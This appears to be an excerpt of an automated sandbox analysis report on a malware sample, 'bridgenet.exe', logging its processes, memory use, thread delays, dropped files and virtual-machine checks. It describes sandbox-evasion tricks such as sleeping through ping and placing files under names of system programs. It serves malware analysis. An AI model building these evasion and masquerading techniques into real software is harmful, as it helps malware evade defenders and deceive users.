Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Memory allocated: 13B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Memory allocated: 1B030000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Memory allocated: 2F60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Memory allocated: 1B2A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Memory allocated: 1420000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Memory allocated: 1AF90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Memory allocated: 1150000 memory reserve \| memory write watch
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Memory allocated: 1AF20000 memory reserve \| memory write watch
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Memory allocated: E30000 memory reserve \| memory write watch
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Memory allocated: 1AAE0000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Memory allocated: D70000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Memory allocated: 1AB00000 memory reserve \| memory write watch
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Memory allocated: 1250000 memory reserve \| memory write watch
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Memory allocated: 1AFF0000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Memory allocated: C00000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Memory allocated: 1A700000 memory reserve \| memory write watch
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Memory allocated: 9B0000 memory reserve \| memory write watch
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Memory allocated: 1A4B0000 memory reserve \| memory write watch
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Memory allocated: 1500000 memory reserve \| memory write watch
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Memory allocated: 1B070000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Memory allocated: 1840000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Memory allocated: 1B390000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Memory allocated: 2450000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Memory allocated: 1A5E0000 memory reserve \| memory write watch
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Memory allocated: 1600000 memory reserve \| memory write watch
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Memory allocated: 1B350000 memory reserve \| memory write watch
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Memory allocated: 9F0000 memory reserve \| memory write watch
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Memory allocated: 1A660000 memory reserve \| memory write watch
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Memory allocated: 13D0000 memory reserve \| memory write watch
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Memory allocated: 1AF40000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Memory allocated: 1350000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Memory allocated: 1B030000 memory reserve \| memory write watch
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Memory allocated: F30000 memory reserve \| memory write watch
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Memory allocated: 1AC30000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NpAnHTXs.log	Jump to dropped file
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LwOexCEJ.log	Jump to dropped file
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xQYgnzsS.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UOGmotWX.log	Jump to dropped file
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZdtVejrZ.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BazpdGXT.log	Jump to dropped file
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZmWTGheo.log	Jump to dropped file
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LfwFFKlf.log	Jump to dropped file
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LzBDVIdW.log	Jump to dropped file

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe TID: 4476	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe TID: 4712	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe TID: 3376	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe TID: 2552	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe TID: 6864	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Internet Explorer\images\dwm.exe TID: 2984	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe TID: 5336	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe TID: 3248	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe TID: 4864	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe TID: 3636	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe TID: 6204	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe TID: 5136	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Internet Explorer\images\dwm.exe TID: 2016	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files\Internet Explorer\images\dwm.exe TID: 2024	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe TID: 2600	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe TID: 1832	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe TID: 3752	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe TID: 2492	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe TID: 4112	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Internet Explorer\images\dwm.exe TID: 6604	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe TID: 4332	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe TID: 920	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe TID: 2696	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Internet Explorer\images\dwm.exe TID: 6388	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files\Internet Explorer\images\dwm.exe TID: 5388	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Internet Explorer\images\dwm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Internet Explorer\images\dwm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Internet Explorer\images\dwm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Internet Explorer\images\dwm.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe

Code function: 21_2_00007FF887D7732A GetSystemInfo,

21_2_00007FF887D7732A

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Internet Explorer\images\dwm.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File opened: C:\Users\user	Jump to behavior

Source: dwm.exe, 0000003A.00000002.2229404359.000000001B6CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
Source: bridgenet.exe.bin.exe, 0000001F.00000002.1863123940.000000001B0BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
